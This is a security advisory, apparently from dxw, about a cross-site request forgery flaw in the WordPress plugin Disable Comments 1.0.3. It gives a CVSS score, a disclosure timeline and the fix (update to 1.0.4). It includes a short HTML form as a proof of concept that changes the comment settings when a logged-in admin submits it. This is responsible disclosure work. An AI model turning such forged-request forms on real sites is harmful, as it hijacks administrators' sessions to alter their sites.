CSRF in Disable Comments 1.0.3

Vulnerability

Last revised: March 31, 2014

A CSRF vulnerability would allow an unauthorised attacker to cause a logged in admin to disable or enable comments if that admin visits a link of the attacker’s choosing (via spearphishing for instance).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	None
Integrity	Partial
Availability	Partial

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Clicking submit on this form will enable comments on all post types.

<form action="http://localhost/wp-admin/options-general.php?page=disable_comments_settings" method="POST">
  <input type="radio" name="mode" value="selected_types" checked>
  <input type='checkbox' name='disabled_types[]' value='post'>
  <input type='checkbox' name='disabled_types[]' value='page'>
  <input type='checkbox' name='disabled_types[]' value='attachment'>
  <input type="submit" name="submit">
</form>

Advisory timeline

2014-03-04: Discovered
2014-03-17: Reported to plugins@wordpress.org. CVE requested.
2014-03-31: No response, so re-reported directly to author. Publication clock restarted.
2014-04-01: Author reports issue fixed.

Mitigation/further actions

Update to version 1.0.4 immediately.

dxw advisories

Advisory: